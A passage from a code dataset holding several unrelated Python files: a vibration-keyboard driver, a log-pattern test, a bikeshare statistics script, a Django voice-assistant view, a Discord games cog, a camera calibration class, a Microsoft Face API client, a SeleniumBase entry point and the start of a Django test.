self.ser.write(b'v')\n        self.ser.write(b'0')\n        self.ser.write(b'\\r')\n\n\n    def vibrate_letter(self, letter, sim=False):\n        \"\"\" Buzz the chord for a letter, all keys at once (sim) or one at a time.\n        \"\"\"\n\n        counter = 0\n\n        if sim:\n            value = 0\n            for key in self.letter_to_chord[letter][::-1]: # switch order of string since MSB and LSB are switching when reading left to right.\n                if key == '1':\n                    vib = pow(2, counter)\n                    value = value + vib\n                counter += 1\n\n            self._vibrate_key(value)\n\n        else:\n            for key in self.letter_to_chord[letter][::-1]: # switch order of string since MSB and LSB are switching when reading left to right.\n                if key == '1':\n                    vib = pow(2, counter)\n                    self._vibrate_key(vib)\n                    print(vib)\n                    time.sleep(.05)\n                    self.ser.reset_input_buffer()\n                counter += 1\n\n\n    def vibrate_chord(self, chord, sim=False):\n        \"\"\" Buzz an arbitrary chord bitstring, all keys at once (sim) or one at a time.\n        \"\"\"\n\n        counter = 0\n\n        if sim:\n            value = 0\n            for key in chord[::-1]: # switch order of string since MSB and LSB are switching when reading left to right.\n                if key == '1':\n                    vib = pow(2, counter)\n                    value = value + vib\n                counter += 1\n\n            self._vibrate_key(value)\n\n        else:\n            for key in chord[::-1]: # switch order of string since MSB and LSB are switching 
when reading left to right.\n if key == '1':\n vib = pow(2, counter)\n self._vibrate_key(vib)\n print(vib)\n time.sleep(.05)\n self.ser.reset_input_buffer() \n counter += 1\n\n","sub_path":"keyboard.py","file_name":"keyboard.py","file_ext":"py","file_size_in_byte":9639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"164412568","text":"\"\"\"\n\"\"\"\nimport pprint\nimport re\n\ntry:\n from stage_check import Output\nexcept ImportError:\n import Output\n\ntry:\n from stage_check import EntryTester\nexcept ImportError:\n import EntryTester\n\ntry:\n from stage_check import AbstractTest\nexcept ImportError:\n import AbstractTest\n\ntry:\n from stage_check import Linux\nexcept ImportError:\n import Linux\n\n\ndef create_instance(test_id, config, args):\n \"\"\"\n Invoked by TestExecutor class to create a test instance\n \n @test_id - test index number\n @config - test parameters from configuration \n @args - command line args\n \"\"\"\n return TestLogs(test_id, config, args)\n\n\nclass TestLogs(AbstractTest.Linux, EntryTester.MatchFunction):\n \"\"\"\n Tests to see if the requested device pattern matches in the \n global namespace and/or the specified namespaces(s)\n \"\"\"\n def __init__(self, test_id, config, args):\n super().__init__(test_id, config, args)\n self.results = []\n\n def get_params(self):\n # apply defaults\n default_params = {\n \"node_type\" : \"primary\",\n \"log_path\" : \"\",\n \"log_glob\" : \"\",\n \"past_hours\" : 0,\n \"extra_granularity\" : False,\n \"excludes\" : [],\n \"patterns\" : [],\n \"result\" : {}\n }\n \n params = self.apply_default_params(default_params)\n return params\n\n def run(self, local_info, router_context, gql_token, fp):\n \"\"\"\n \"\"\"\n test_info = self.test_info(local_info, router_context)\n self.output.test_start(test_info, status=Output.Status.OK)\n params = self.get_params()\n\n if self.check_user() != Output.Status.OK:\n return self.output.test_end(fp)\n\n self.output.progress_start(fp)\n router_context.query_node_info()\n\n uptime_data = {}\n service_data = {}\n cores_data = []\n\n # Ugly....\n self.fp = fp\n error_lines = []\n logs_since_data = []\n logs_since = Linux.LogFilesSince(self.debug, progobj=self)\n shell_status = logs_since.run_linux_args(\n router_context, \n params['node_type'], \n params['log_path'],\n params['log_glob'],\n params['past_hours'],\n error_lines,\n logs_since_data\n )\n\n if len(error_lines) > 0:\n # Ugly...\n self.fp = None\n self.output.proc_run_linux_error(shell_status, error_lines[0])\n return self.output.test_end(fp)\n\n if self.debug:\n print('........ 
logs_since_data ..........')\n pprint.pprint(logs_since_data)\n\n file_list = []\n for entry in logs_since_data:\n file_list.append(entry[\"file\"])\n\n include_patterns = []\n for entry in params[\"patterns\"]:\n include_patterns.append(entry[\"regex\"])\n exclude_patterns = []\n for entry in params[\"excludes\"]:\n exclude_patterns.append(entry)\n\n match_data = {}\n error_lines = []\n log_matches = Linux.LogFileMatches(\n self.debug, \n progobj=self, \n past_hours=params['past_hours'],\n extra_granularity=params['extra_granularity']\n )\n shell_status = log_matches.run_linux_args(\n router_context, \n params['node_type'], \n params['log_path'],\n file_list,\n include_patterns,\n exclude_patterns,\n error_lines,\n match_data\n )\n\n if len(error_lines) > 0:\n # Ugly...\n self.fp = None\n self.output.proc_run_linux_error(shell_status, error_lines[0])\n return self.output.test_end(fp)\n\n if self.debug:\n print('........ match_data flattened list ..........')\n pprint.pprint(match_data)\n\n # process json data\n match_data[\"total_patterns\"] = 0\n if \"patterns\" in params:\n match_data[\"total_patterns\"] = len(params[\"patterns\"])\n for match in match_data[\"matches\"]:\n for key in match_data:\n if key == \"matches\":\n continue\n match[key] = match_data[key]\n match[\"past_hours\"] = params[\"past_hours\"]\n self.output.proc_pattern_matched(params, match)\n\n self.output.proc_test_result(params, match_data)\n self.output.test_end(fp)\n","sub_path":"stage_check/stage_check/TestLogs.py","file_name":"TestLogs.py","file_ext":"py","file_size_in_byte":4312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"153418114","text":"import time\nimport pandas as pd\n\nCITY_DATA = { 'chicago': 'chicago.csv',\n 'new york city': 'new_york_city.csv',\n 'washington': 'washington.csv' }\n\ndef get_filters():\n \"\"\"\n Asks user to specify a city, month, and day to analyze.\n\n Returns:\n (str) city - name of the city to analyze\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\n\n \"\"\"\n\n ## get user input for city.\n ## prevent/reduce user input errors (Newyork or New York or New York City) by requesting only one letter for the city\n\n print (\"\\nWhich city's statistics would you like to see?\")\n while True:\n city = input(\"Choose a city by entering a letter.\\nc for Chicago or n - New york or w - Washington:\").lower()\n if city not in (\"c\",\"n\",\"w\"):\n print(\"\\nInvalid Entry!\")\n print(\"-\"*14)\n else:\n break\n\n ## converting input to full city name to keep the values returned by this function named properly. CITY_DATA dictionary's keys were not changed to a letter to keep code readable. 
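A lookup dict, e.g. city = {\"c\": \"chicago\", \"n\": \"new york city\", \"w\": \"washington\"}[city], would be an equivalent one-liner.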
\n    if city == \"c\":\n        city = \"chicago\"\n    elif city == \"n\":\n        city = \"new york city\"\n    else:\n        city = \"washington\"\n\n    print('*'*40)\n\n    ## get user input for month and day filters\n    ## prevent/reduce user input error by requesting only a number\n\n    print(\"\\nWould you like to include all months or filter data for one specific month?\")\n    while True:\n        month = input(\"Enter a digit from 0 to 6 corresponding to:\\n0-include all months\\n1-January\\n2-February\\n3-March\\n4-April\\n5-May\\n6-June\\n:\")\n        if month not in (\"0\",\"1\",\"2\",\"3\",\"4\",\"5\",\"6\"):\n            print(\"\\nInvalid Entry!\")\n            print(\"-\"*14)\n        else:\n            break\n\n    print('*'*40)\n\n\n    print(\"\\nWould you like to include all days of week or filter for one specific day?\")\n    while True:\n        day = input(\"Enter a digit from 0 to 7 corresponding to:\\n0-include all days\\n1-Monday\\n2-Tuesday\\n3-Wednesday\\n4-Thursday\\n5-Friday\\n6-Saturday\\n7-Sunday\\n:\")\n        if day not in (\"0\",\"1\",\"2\",\"3\",\"4\",\"5\",\"6\",\"7\"):\n            print(\"\\nInvalid Entry!\")\n            print(\"-\"*14)\n        else:\n            break\n\n    # convert type of inputs from str to int\n    month = int(month)\n    day = int(day)\n\n    # print(\"City= \",city)\n    # print(\"Month= \",month)\n    # print(\"Day= \",day)\n\n    print('*'*50)\n\n    return city, month, day\n\n\ndef load_data(city, month, day):\n    \"\"\"\n    Loads data for the specified city and filters by month and day if applicable.\n\n    Args:\n        (str) city - name of the city to analyze\n        (int) month - month number to filter by (1-6), or 0 to apply no month filter\n        (int) day - day number to filter by (1=Monday ... 7=Sunday), or 0 to apply no day filter\n    Returns:\n        df - Pandas DataFrame containing city data filtered by month and day\n    \"\"\"\n    # load data file into a dataframe\n    df = pd.read_csv(CITY_DATA[city])\n\n    # convert the Start Time column to datetime\n    df['Start Time'] = pd.to_datetime(df['Start Time'])\n\n    # extract month and day of week from Start Time to create new columns\n    df['month'] = df['Start Time'].dt.month\n    df['day_of_week'] = df['Start Time'].dt.dayofweek\n    df['hour'] = df['Start Time'].dt.hour\n\n    # filter by month if applicable\n    if month != 0:\n        df = df[(df.month == month)]\n\n    # filter by day of week if applicable; dt.dayofweek is 0-based (Monday == 0) while the prompt is 1-based\n    if day != 0:\n        df = df[df['day_of_week'] == day - 1]\n\n    return df\n\n\ndef time_stats(df):\n    \"\"\"Displays statistics on the most frequent times of travel.\"\"\"\n\n    print('\\nThe Most Frequent Times of Travel:\\n')\n    start_time = time.time()\n\n    # display the most common month\n    print(\"The most common month is:\",df[\"month\"].mode()[0])\n\n    # display the most common day of week\n    print(\"The most common day of week is:\",df[\"day_of_week\"].mode()[0])\n\n    # display the most common start hour\n    print(\"The most common hour is:\",df[\"hour\"].mode()[0])\n\n    print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n    print('-'*40)\n\n\ndef station_stats(df):\n    \"\"\"Displays statistics on the most popular stations and trip.\"\"\"\n\n    print('\\nThe Most Popular Stations and Trip:\\n')\n    start_time = time.time()\n\n    # display most commonly used start station\n    print(\"The most commonly used starting station is:\\n\",df[\"Start Station\"].mode()[0])\n    # display most commonly used end station\n    print(\"The most commonly used ending station is:\\n\", df[\"End Station\"].mode()[0])\n    # display most frequent combination of start station and end station trip\n    print(\"The most frequent combination of start station and end station is:\\n\", (df[\"Start Station\"] + ' AND ' + df[\"End Station\"]).mode()[0])\n\n    print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n    print('-'*40)\n\n\ndef trip_duration_stats(df):\n    \"\"\"Displays statistics on the total and average trip duration.\"\"\"\n\n    print('\\nTrip Duration Statistics:\\n')\n    start_time = time.time()\n\n    # display total travel time, summed from the Trip Duration column as recorded\n    print(\"The total travel time is:\",df[\"Trip Duration\"].sum())\n\n    # display mean travel time\n    print(\"The mean travel time is:\",df[\"Trip Duration\"].mean())\n\n    print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n    print('-'*40)\n\n\ndef user_stats(df):\n    \"\"\"Displays statistics on bikeshare users.\"\"\"\n\n    print('\\nUser Statistics:\\n')\n    start_time = time.time()\n\n    # Display counts of user types\n    print(\"The user types and their count is:\\n\",df[\"User Type\"].value_counts(ascending=False))\n\n    # Display counts of gender only if the data is available\n    ## It was pre-stated that gender data is not available for one city hence this check is added only here\n    if df.get(\"Gender\") is not None:\n        print(\"\\nThe gender split is:\\n\",df[\"Gender\"].value_counts(ascending=False))\n\n    # Display earliest, most recent, and most common year of birth only if the data is available\n    ## It was pre-stated that year of birth data is not available for one city hence this check is added only here\n    if df.get(\"Birth Year\") is not None:\n        print(\"\\nThe earliest year of birth of users is:\",int(df[\"Birth Year\"].min()))\n        print(\"The latest year of birth of users is:\",int(df[\"Birth Year\"].max()))\n        print(\"The most common year of birth of users is:\",int(df[\"Birth Year\"].mode()[0]))\n\n    print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n    print('-'*40)\n\n\ndef raw_data(df):\n    \"\"\"Displays raw data from CSV files 5 lines at a time based on user input\"\"\"\n    start_time = time.time()\n\n    # Find out if user wishes to see raw data\n    while True:\n        data = input('Would you like to see the raw data? Enter y for yes and n for no.\\n:').lower()\n        if data not in (\"y\",\"n\"):\n            print(\"\\nInvalid Entry!\")\n            print(\"-\"*14)\n        else:\n            break\n\n    ## Print 5 rows of data at a time and ask the user each time whether more raw data is desired\n    n = 0 # set row number counter to zero\n    while data == 'y':\n        print(df.iloc[n:n+5])\n        n += 5\n        while True:\n            data = input('Would you like to see more raw data? Enter y for yes and n for no.\\n:').lower()\n            if data not in (\"y\",\"n\"):\n                print(\"\\nInvalid Entry!\")\n                print(\"-\"*14)\n            else:\n                break\n\n    print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n    print('-'*40)\n\n\ndef main():\n\n    print('*'*50)\n    print('Hello! Welcome to the US bikeshare data center!\\nLet\\'s look at some interesting statistics!')\n    print('*'*50)\n\n    while True:\n        city, month, day = get_filters()\n        df = load_data(city, month, day)\n\n        # Check whether the applied filters produced an empty dataframe\n        if len(df.index) == 0:\n            print('! '*30)\n            print(\"There is no data for the selected month and day filters.\\nPlease select different filters.\")\n            print('! '*30)\n            print()\n            continue\n\n        time_stats(df)\n        station_stats(df)\n        trip_duration_stats(df)\n        user_stats(df)\n        raw_data(df)\n\n        while True:\n            restart = input('Would you like to restart? 
Enter y for yes or n for no.\\n:').lower()\n            if restart not in (\"y\",\"n\"):\n                print(\"\\nInvalid Entry!\")\n                print(\"-\"*14)\n            else:\n                break\n\n        if restart != 'y':\n            break\n\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"bikeshare2.py","file_name":"bikeshare2.py","file_ext":"py","file_size_in_byte":8638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"312167847","text":"import os\nimport json\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\nfrom function.baidu_ai import audio2text, text2audio\nfrom function.tuling import get_roboot_answer\nfrom function.gensim_lsi import get_high_sim\nfrom function.database import read_answer\nfrom selenium import webdriver\nfrom function.come import *\nimport time\nimport win32api\nimport win32con\nfrom selenium.webdriver.common.keys import Keys\n# Create your views here.\n\ncon={}\ndef home(request):\n    return render(request, 'robot_app/index.html',{'历史记录':con})\n\n\ndef upload(request):\n    # print(request.POST)\n    file_name = os.path.join('robot_app', 'static', 'audio_file', request.POST['name'])\n    file = request.FILES['file']\n\n    with open(file_name, 'wb') as f:\n        f.write(file.read())\n    text = audio2text(file_name)\n    # commands start with 搜索 (search), 发送 (send) or 播放 (play); match on the two-character prefix\n    if text[0:2] == '搜索' or text[0:2] == '发送' or text[0:2] == '播放':\n        index = get_high_sim(text[0:2])\n    else:\n        index = get_high_sim(text)\n    if index is not None:\n        answer = read_answer(index)\n        if index == 4:\n            os.popen('notepad')\n        if index == 3:\n            os.popen('G:\\\\QQ\\\\Bin\\\\QQScLauncher.exe')\n            time.sleep(5)\n            win32api.keybd_event(13, 0, 0, 0) # 13 is the Enter key code\n            win32api.keybd_event(13, 0, win32con.KEYEVENTF_KEYUP, 0)\n        if index == 5:\n            driver = webdriver.Chrome() # launch the browser\n            driver.get(\"http://www.baidu.com\") # open the search page\n            time.sleep(3) # stay on this page for 3 seconds\n            # print(\"site title:\",driver.title) # fetch and print the site name; a keyword.txt file could hold arbitrary search keywords, e.g. selenium, python, 赵丽颖 (one per line)\n            driver.find_element('id', 'kw').send_keys(text[2:]) # locate the input box by its id 'kw' and type the query\n            driver.find_element('id', 'su').click() # locate the search button by its id 'su' and click it\n            # time.sleep(5) # pause 5 seconds\n        if index == 6:\n            picture_time = time.strftime(\"%Y-%m-%d-%H_%M_%S\", time.localtime(time.time()))\n            directory_time = time.strftime(\"%Y-%m-%d\", time.localtime(time.time()))\n            print(picture_time)\n            print(directory_time)\n            # print the working directory\n            print(os.getcwd())\n            # check for a folder named after today's date under the current directory and create it if missing\n            try:\n                File_Path = os.getcwd() + '\\\\' + directory_time + '\\\\'\n                if not os.path.exists(File_Path):\n                    os.makedirs(File_Path)\n                    print(\"directory created: %s\" % File_Path)\n                else:\n                    print(\"directory already exists!!!\")\n            except BaseException as msg:\n                print(\"failed to create directory: %s\" % msg)\n            driver = webdriver.Chrome()\n            driver.get(\"https://baidu.com/\")\n            try:\n                url = driver.save_screenshot('.\\\\' + directory_time + '\\\\' + picture_time + '.png')\n                print(\"%s : screenshot saved!!!\" % url)\n            except BaseException as pic_msg:\n                print(\"screenshot failed: %s\" % pic_msg)\n            time.sleep(2)\n            driver.quit()\n        if index == 7:\n            os.popen('G:\\\\CloudMusic\\\\cloudmusic.exe')\n            time.sleep(8)\n            start()\n        if index == 8:\n            x = text.index('给')\n            to_who = text[x+1:]\n            msg = text[2:x]\n            qq(to_who)\n            send_qq(to_who,msg)\n        if index == 9:\n            stop()\n        if index == 10:\n            last()\n        if index == 11:\n            next()\n        if index == 12:\n            turn_up()\n        if index == 13:\n            turn_down()\n        if index == 14:\n            love()\n        if index == 15:\n            show_words()\n        if index == 16:\n            shoutsown_words()\n        if index == 17:\n            os.system(r'taskkill /f /t /im cloudmusic.exe')\n        if index == 18:\n            
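# intent 18 resumes playback, using the same helper invoked after launching the player above\n            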
start()\n        if index == 19:\n            music = text[2:]\n            find_music()\n            time.sleep(1)\n            play_music(music)\n    else:\n        answer = get_roboot_answer(text)\n    con[text] = answer\n    hecheng_name = os.path.join('robot_app', 'static', 'audio_file', 'hecheng' + request.POST['name'])\n\n    if text2audio(answer, hecheng_name):\n        print('synthesis succeeded!')\n        # path relative to the app directory, as served to the front end\n        res_name = hecheng_name.replace('robot_app' + os.sep, '', 1)\n    else:\n        print('synthesis failed!')\n        res_name = ''\n\n    res_str = {\n        'play_tpe': 'talk',\n        'res_name': res_name,\n        'content': answer\n    }\n\n    return HttpResponse(json.dumps(res_str), content_type='application/json')\n","sub_path":"robot_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"424501181","text":"from .util.game import *\nfrom .uno import *\nfrom .mafia import *\nfrom .quiz import *\nfrom .hangman import *\nfrom .connectfour import *\nfrom .chess import *\n\n\nclass Games(commands.Cog):\n\n    def __init__(self, bot):\n        self.bot = bot\n        self.handler = GameHandler(bot)\n\n    @commands.Cog.listener()\n    async def on_message(self, message):\n        await self.handler.on_message(message)\n\n    @commands.Cog.listener()\n    async def on_command_error(self, ctx, error):\n        await self.handler.on_command_error(ctx, error)\n\n    @commands.command(name=\"balance\",\n                      aliases=[\"bal\"],\n                      brief=\"See how many tokens you have\")\n    @commands.guild_only()\n    async def balance(self, ctx):\n        tokens = self.bot.config.get(ctx.guild.id, \"tokens\")\n        if ctx.author.id in tokens:\n            await ctx.send(f\"You have {tokens[ctx.author.id]} token(s).\")\n        else:\n            await ctx.send(f\"You have 0 token(s).\")\n\n    @commands.group(name=\"games\",\n                    aliases=[\"game\"],\n                    brief=\"Commands to do with games\")\n    async def game(self, ctx):\n        if ctx.invoked_subcommand is None:\n            await ctx.send(\"Invalid command passed.\")\n\n    @game.command(name=\"list\",\n                  brief=\"List the available games\")\n    async def game_list(self, ctx):\n        await ctx.send(f\"The following games are available to play:\\n\"\n                       f\"• uno\\n\"\n                       f\"• quiz\\n\"\n                       f\"• hangman\\n\"\n                       f\"• connectfour\\n\"\n                       f\"• chess\")\n\n    \"\"\"\n    @game_dec(name=\"uno\",\n              fullname=\"UNO\",\n              cls=Uno,\n              brief=\"Play a game of UNO\")\n    async def uno(self, ctx):\n        if ctx.invoked_subcommand is None:\n            return\n\n    @uno.command(name=\"hand\")\n    async def uno_hand(self, ctx):\n        game = self.handler.get_game(ctx.channel)\n        if not isinstance(game, Uno):\n            await ctx.send(\"There is no uno game in this channel.\")\n            return\n        if not game.playing:\n            await ctx.send(\"That game has not started.\")\n            return\n        if ctx.author not in game.hands:\n            return\n        dm = await ctx.author.create_dm()\n        await dm.send(\"You have the following cards in your hand:\\n\"\n                      + \", \".join(CARD_EMOJIS[k] + \" \" + CARD_STRINGS[k] for k in game.hands[ctx.author]))\n        await ctx.send(\"Your hand has been DMed to you.\")\n    \"\"\"\n\n    @game_dec(name=\"quiz\",\n              fullname=\"Quiz\",\n              cls=Quiz,\n              brief=\"Quiz yourself from a set of random questions\")\n    async def quiz(self, ctx):\n        if ctx.invoked_subcommand is None:\n            return\n\n    @game_dec(name=\"hangman\",\n              fullname=\"Hangman\",\n              cls=Hangman,\n              brief=\"Play a game of hangman\")\n    async def hangman(self, ctx):\n        if ctx.invoked_subcommand is None:\n            return\n\n    @game_dec(name=\"connectfour\",\n              fullname=\"Connect Four\",\n              aliases=[\"c4\"],\n              cls=ConnectFour,\n              brief=\"Play a game of Connect Four\")\n    async def connectfour(self, ctx):\n        if ctx.invoked_subcommand is None:\n            return\n\n    @game_dec(name=\"chess\",\n              
fullname=\"Chess\",\n cls=Chess,\n brief=\"Play a game of chess\")\n async def chess(self, ctx):\n if ctx.invoked_subcommand is None:\n return\n\n @chess.command(name=\"resign\",\n brief=\"Leave and forfeit the chess game\")\n async def resign(self, ctx):\n game = self.handler.get_game(ctx.channel)\n if not isinstance(game, Chess):\n await ctx.send(\"There is no chess game in this channel.\")\n return\n if not game.playing:\n await ctx.send(\"That game has not started.\")\n return\n if ctx.author not in game.players:\n await ctx.send(\"You are not in that game.\")\n return\n game.winner = game.players[0] if ctx.author != game.players[0] else game.players[1]\n await game.end()\n\n @chess.command(name=\"draw\",\n brief=\"Offer a draw to your opponent\")\n async def draw(self, ctx, *, query=None):\n game = self.handler.get_game(ctx.channel)\n if not isinstance(game, Chess):\n await ctx.send(\"There is no chess game in this channel.\")\n return\n if not game.playing:\n await ctx.send(\"That game has not started.\")\n return\n if query is None:\n if ctx.author in game.draw_requests or ctx.author in game.on_draw_cooldown:\n await ctx.send(\"You have already requested a draw this turn.\")\n return\n game.draw_requests.append(ctx.author)\n if game.can_claim_draw():\n if ctx.author == game.get_turn():\n game.winner = None\n await game.end()\n return\n else:\n await ctx.send(\"You can only claim a draw when it is your turn.\")\n return\n if len(game.draw_requests) == len(game.players):\n game.winner = None\n await game.end()\n else:\n game.on_draw_cooldown.append(ctx.author)\n await ctx.send(\"You have requested a draw. Wait for your opponent to respond.\")\n elif query.lower() == \"accept\":\n if game.draw_requests == list():\n await ctx.send(\"There is no draw request to accept.\")\n elif ctx.author in game.draw_requests:\n await ctx.send(\"You can't accept your own draw request.\")\n else:\n game.winner = None\n await game.end()\n elif query.lower() == \"decline\":\n if game.draw_requests == list():\n await ctx.send(\"There is no draw request to decline.\")\n elif ctx.author in game.draw_requests:\n await ctx.send(\"You can't decline your own draw request.\")\n else:\n game.draw_requests = list()\n await ctx.send(\"You declined the draw request.\")\n else:\n await ctx.send(\"Invalid syntax.\")\n\n @game_dec(name=\"mafia\",\n fullname=\"Mafia\",\n cls=Mafia,\n brief=\"Play a game of Mafia\")\n async def mafia(self, ctx):\n if ctx.invoked_subcommand is None:\n return\n\n @game_dec(name=\"uno\",\n fullname=\"Uno\",\n cls=Uno,\n brief=\"Play a game of Uno\")\n async def uno(self, ctx):\n if ctx.invoked_subcommand is None:\n return\n\n\ndef setup(bot):\n bot.add_cog(Games(bot))\n","sub_path":"modules/games/cog.py","file_name":"cog.py","file_ext":"py","file_size_in_byte":6790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"88645950","text":"import numpy as np\nimport cv2\nimport glob\nimport pickle\nimport os\nimport matplotlib.pyplot as plt\n\n\nclass CalibratedCamera:\n\n def __init__(self, camera_calibration_pickle=\"camera_calibration_pickle.p\", \n calibration_images_pattern=\"camera_cal/calibration*.jpg\"):\n if os.path.exists(camera_calibration_pickle):\n self._calibrate_camera_by_pickle(camera_calibration_pickle)\n else:\n self._calibrate_camera_by_chessboard_images(9, 6, \n camera_calibration_pickle, calibration_images_pattern)\n\n\n def undistort(self, img):\n return cv2.undistort(img, self.mtx, self.dist, None, self.mtx)\n \n\n def 
undistort_file(self, source_image_file, destination_image_file):\n img = cv2.imread(source_image_file)\n dst = cv2.undistort(img, self.mtx, self.dist, None, self.mtx)\n cv2.imwrite(destination_image_file, dst)\n\n def _calibrate_camera_by_pickle(self, camera_calibration_pickle):\n print('Reading calibrated camera parameters from pickle file')\n with open(camera_calibration_pickle,\"rb\") as pickle_in:\n dist_pickle = pickle.load(pickle_in)\n\n self.mtx = dist_pickle[\"mtx\"]\n self.dist = dist_pickle[\"dist\"]\n\n\n def _calibrate_camera_by_chessboard_images(self, nx, ny, \n camera_calibration_pickle, calibration_images_pattern):\n # prepare object points, like (0,0,0), (1,0,0), (2,0,0) ....,(6,5,0)\n print('Calibrating camera')\n objp = np.zeros((nx * ny, 3), np.float32)\n objp[:,:2] = np.mgrid[0:nx, 0:ny].T.reshape(-1,2)\n\n # Arrays to store object points and image points from all the images.\n objpoints = [] # 3d points in real world space\n imgpoints = [] # 2d points in image plane.\n\n # Make a list of calibration images\n images = glob.glob(calibration_images_pattern)\n\n # Step through the list and search for chessboard corners\n for fname in images:\n img = cv2.imread(fname)\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n # Find the chessboard corners\n ret, corners = cv2.findChessboardCorners(gray, (nx, ny), None)\n\n # If found, add object points, image points\n if ret == True:\n objpoints.append(objp)\n imgpoints.append(corners)\n\n img = cv2.imread(\"camera_cal/calibration1.jpg\")\n img_size = (img.shape[1], img.shape[0])\n\n ret, mtx, dist, rvecs, tvecs = cv2.calibrateCamera(objpoints, imgpoints, img_size,None,None)\n dist_pickle = {}\n dist_pickle[\"mtx\"] = mtx\n dist_pickle[\"dist\"] = dist\n\n with open(camera_calibration_pickle, \"wb\") as pickle_file: \n pickle.dump(dist_pickle, pickle_file)\n\n self.mtx = mtx\n self.dist = dist","sub_path":"calibrate_camera.py","file_name":"calibrate_camera.py","file_ext":"py","file_size_in_byte":2808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"306980400","text":"import os\r\nimport sys\r\n\r\n# Remove \"\" and current working directory from the first entry\r\n# of sys.path (if present) to avoid using the current directory\r\n# in SeleniumBase commands when invoked as \"python -m sbase \"\r\nif sys.path[0] in (\"\", os.getcwd()):\r\n sys.path.pop(0)\r\n\r\nif __package__ == \"\":\r\n path = os.path.dirname(os.path.dirname(__file__))\r\n sys.path.insert(0, path)\r\n\r\nif __name__ == \"__main__\":\r\n import warnings\r\n from seleniumbase.console_scripts.run import main\r\n\r\n warnings.filterwarnings(\r\n \"ignore\", category=DeprecationWarning, module=\".*packaging\\\\.version\"\r\n )\r\n main()\r\n sys.exit()\r\n","sub_path":"sbase/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"549679639","text":"import asyncio\nimport aiohttp\nimport async_timeout\nfrom utils import funcs\nimport json\nimport urllib\n\nclass MSFace():\n\n\tdef __init__(self,**kwargs):\n\t\tself.app_key = kwargs.pop(\"key\")\n\t\tself.session = aiohttp.ClientSession()\n\t\tself.base_url = \"https://westus.api.cognitive.microsoft.com/face/v1.0\" #Put API url here (it varies from region to region)\n\t\tself.base_headers = {\"Ocp-Apim-Subscription-Key\":self.app_key,\"Content-Type\":\"application/json\"}\n\n\tasync def http_post(self, url, **kwargs):\n\t\tisjson = 
kwargs.pop(\"json\",False)\n\t\theaders = kwargs.pop(\"headers\",{})\n\t\tparams = kwargs.pop(\"params\",{})\n\t\ttry:\n\t\t\twith async_timeout.timeout(10):\n\t\t\t\tasync with self.session.post(url,headers=headers,data=params) as resp:\n\t\t\t\t\tdata = (await resp.read()).decode(\"utf-8\")\n\t\t\t\t\tif isjson:\n\t\t\t\t\t\tdata = json.loads(data)\n\t\t\t\t\treturn data\n\t\texcept asyncio.TimeoutError:\n\t\t\treturn False\n\t\texcept Exception as e:\n\t\t\tprint(e)\n\t\t\treturn False\n\n\tasync def http_get(self, url, **kwargs):\n\t\theaders = kwargs.pop(\"headers\",{})\n\t\t# use a distinct local name so the json module is not shadowed\n\t\tisjson = kwargs.pop(\"json\",False)\n\t\ttry:\n\t\t\twith async_timeout.timeout(10):\n\t\t\t\tasync with self.session.get(url,headers=headers) as resp:\n\t\t\t\t\tif isjson:\n\t\t\t\t\t\tdata = json.loads(await resp.text())\n\t\t\t\t\telse:\n\t\t\t\t\t\tdata = await resp.read()\n\t\t\t\t\treturn data\n\t\texcept asyncio.TimeoutError:\n\t\t\treturn False\n\t\texcept Exception as e:\n\t\t\tprint(e)\n\t\t\treturn False\n\n\tasync def detect(self,url,**kwargs):\n\t\tlandmarks = kwargs.pop(\"landmarks\",True)\n\t\tfaceid = kwargs.pop(\"ids\",False)\n\t\tattributes = kwargs.pop(\"attributes\",\"\")\n\t\tparams = {\"url\":url}\n\t\turlparams = {\"returnFaceLandmarks\":str(landmarks).lower(),\"returnFaceId\":str(faceid).lower()}\n\t\tif attributes:\n\t\t\tparams[\"returnFaceAttributes\"] = attributes\n\t\tif urlparams:\n\t\t\turlparams = \"?\" + urllib.parse.urlencode(urlparams)\n\t\telse:\n\t\t\turlparams = \"\"\n\t\tresp = await self.http_post(self.base_url+\"/detect\"+urlparams,headers=self.base_headers,params=json.dumps(params),json=True)\n\t\treturn resp\n","sub_path":"utils/MSFace.py","file_name":"MSFace.py","file_ext":"py","file_size_in_byte":1944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"449800310","text":"from django.urls import reverse\nfrom rest_framework import status, test\n\nfrom accounts.tests.factories import AccountFactory\nfrom cards.models import CardAnswer\nfrom cards.tests.factories import CardAnswerFactory, CardQuestionFactory\n\n\nclass CardAnswerListTestCase(test.APITestCase):\n    @classmethod\n    def setUpTestData(cls):\n        cls.question = CardQuestionFactory()\n        cls.answer_list_url = reverse('answer-list', args=(cls.question.pk,))\n\n        cls.account = AccountFactory()\n        cls.admin_account = AccountFactory(user__is_staff=True)\n\n        cls.answer = CardAnswerFactory(author=cls.account, question=cls.question)\n        cls.other_answer = CardAnswerFactory(question=cls.question)\n\n        cls.answer_other_question = CardAnswerFactory(author=cls.account)\n\n    def setUp(self):\n        self.client.force_login(self.account.user)\n\n    def test_unauthenticated_user_cannot_access(self):\n        self.client.logout()\n\n        response = self.client.get(self.answer_list_url)\n\n        self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)\n\n    def test_admin_get_all_answers_from_one_question(self):\n        